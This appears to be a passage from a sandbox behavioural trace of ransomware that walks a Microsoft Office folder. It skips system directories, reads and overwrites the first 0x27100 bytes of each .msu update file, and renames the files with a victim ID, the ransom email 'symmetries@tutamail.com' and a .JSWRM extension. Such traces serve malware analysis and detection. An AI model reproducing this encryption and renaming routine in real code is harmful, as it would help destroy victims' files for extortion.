RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0102.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0102.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0102.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0102.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0102.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0102.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.355] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows6.1-KB2999226-x86.msu" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows6.1-kb2999226-x86.msu"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows6.1-KB2999226-x86.msu.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows6.1-kb2999226-x86.msu.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0102.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0102.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0102.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0102.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0102.356] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x59b433, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x59b433, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5c164a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14902e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Windows8-RT-KB2999226-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0102.356] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x64.msu", lpString2=".") returned 1 [0102.356] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x64.msu", lpString2="..") returned 1 [0102.356] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x64.msu", lpString2="...") returned 1 [0102.356] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x64.msu", lpString2="windows") returned 1 [0102.356] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x64.msu", lpString2="recovery") returned 1 [0102.357] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x64.msu", lpString2="perflogs") returned 1 [0102.357] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x64.msu", lpString2="documents and settings") returned 1 [0102.357] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x64.msu", lpString2="$RECYCLE.BIN") returned 1 [0102.357] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x64.msu", lpString2="system volume information") returned 1 [0102.357] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x64.msu", lpString2="msocache") returned 1 [0102.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8-RT-KB2999226-x64.msu", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0102.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8-RT-KB2999226-x64.msu", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows8-RT-KB2999226-x64.msu", lpUsedDefaultChar=0x0) returned 29 [0102.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8-RT-KB2999226-x64.msu", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0102.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8-RT-KB2999226-x64.msu", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows8-RT-KB2999226-x64.msu", lpUsedDefaultChar=0x0) returned 29 [0102.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0102.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0102.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0102.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8-RT-KB2999226-x64.msu" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8-rt-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.363] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1347630) returned 1 [0102.363] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0102.363] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0102.376] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.376] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0102.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.376] CloseHandle (hObject=0x45c) returned 1 [0102.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0102.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0102.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0102.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0102.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0102.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0102.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.377] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8-RT-KB2999226-x64.msu" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8-rt-kb2999226-x64.msu"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8-RT-KB2999226-x64.msu.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8-rt-kb2999226-x64.msu.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0102.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0102.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0102.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0102.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0102.378] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d50bdc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d50bdc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6d50bdc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x96388, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Windows8-RT-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0102.378] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x86.msu", lpString2=".") returned 1 [0102.378] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x86.msu", lpString2="..") returned 1 [0102.378] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x86.msu", lpString2="...") returned 1 [0102.378] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x86.msu", lpString2="windows") returned 1 [0102.378] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x86.msu", lpString2="recovery") returned 1 [0102.378] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x86.msu", lpString2="perflogs") returned 1 [0102.378] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x86.msu", lpString2="documents and settings") returned 1 [0102.378] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x86.msu", lpString2="$RECYCLE.BIN") returned 1 [0102.378] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x86.msu", lpString2="system volume information") returned 1 [0102.378] lstrcmpiW (lpString1="Windows8-RT-KB2999226-x86.msu", lpString2="msocache") returned 1 [0102.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8-RT-KB2999226-x86.msu", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0102.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8-RT-KB2999226-x86.msu", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows8-RT-KB2999226-x86.msu", lpUsedDefaultChar=0x0) returned 29 [0102.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0102.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8-RT-KB2999226-x86.msu", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0102.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8-RT-KB2999226-x86.msu", cchWideChar=29, lpMultiByteStr=0x241010, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows8-RT-KB2999226-x86.msu", lpUsedDefaultChar=0x0) returned 29 [0102.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0102.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0102.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0102.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0102.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8-RT-KB2999226-x86.msu" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8-rt-kb2999226-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.380] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=615304) returned 1 [0102.380] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0102.380] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0102.393] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.393] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0102.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.394] CloseHandle (hObject=0x45c) returned 1 [0102.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0102.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0102.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0102.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0102.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0102.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0102.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.394] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8-RT-KB2999226-x86.msu" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8-rt-kb2999226-x86.msu"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8-RT-KB2999226-x86.msu.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8-rt-kb2999226-x86.msu.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0102.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0102.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0102.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0102.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0102.395] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5f9c329, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f9c329, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5fc257f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf2d1d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Windows8.1-KB2999226-x64.msu", cAlternateFileName="WI2C39~1.MSU")) returned 1 [0102.396] lstrcmpiW (lpString1="Windows8.1-KB2999226-x64.msu", lpString2=".") returned 1 [0102.396] lstrcmpiW (lpString1="Windows8.1-KB2999226-x64.msu", lpString2="..") returned 1 [0102.396] lstrcmpiW (lpString1="Windows8.1-KB2999226-x64.msu", lpString2="...") returned 1 [0102.396] lstrcmpiW (lpString1="Windows8.1-KB2999226-x64.msu", lpString2="windows") returned 1 [0102.396] lstrcmpiW (lpString1="Windows8.1-KB2999226-x64.msu", lpString2="recovery") returned 1 [0102.396] lstrcmpiW (lpString1="Windows8.1-KB2999226-x64.msu", lpString2="perflogs") returned 1 [0102.396] lstrcmpiW (lpString1="Windows8.1-KB2999226-x64.msu", lpString2="documents and settings") returned 1 [0102.396] lstrcmpiW (lpString1="Windows8.1-KB2999226-x64.msu", lpString2="$RECYCLE.BIN") returned 1 [0102.396] lstrcmpiW (lpString1="Windows8.1-KB2999226-x64.msu", lpString2="system volume information") returned 1 [0102.396] lstrcmpiW (lpString1="Windows8.1-KB2999226-x64.msu", lpString2="msocache") returned 1 [0102.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0102.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x241060, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows8.1-KB2999226-x64.msu", lpUsedDefaultChar=0x0) returned 28 [0102.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0102.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0102.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x241100, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows8.1-KB2999226-x64.msu", lpUsedDefaultChar=0x0) returned 28 [0102.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0102.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0102.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0102.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0102.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8.1-KB2999226-x64.msu" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.397] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=994589) returned 1 [0102.397] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0102.397] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0102.417] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.417] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 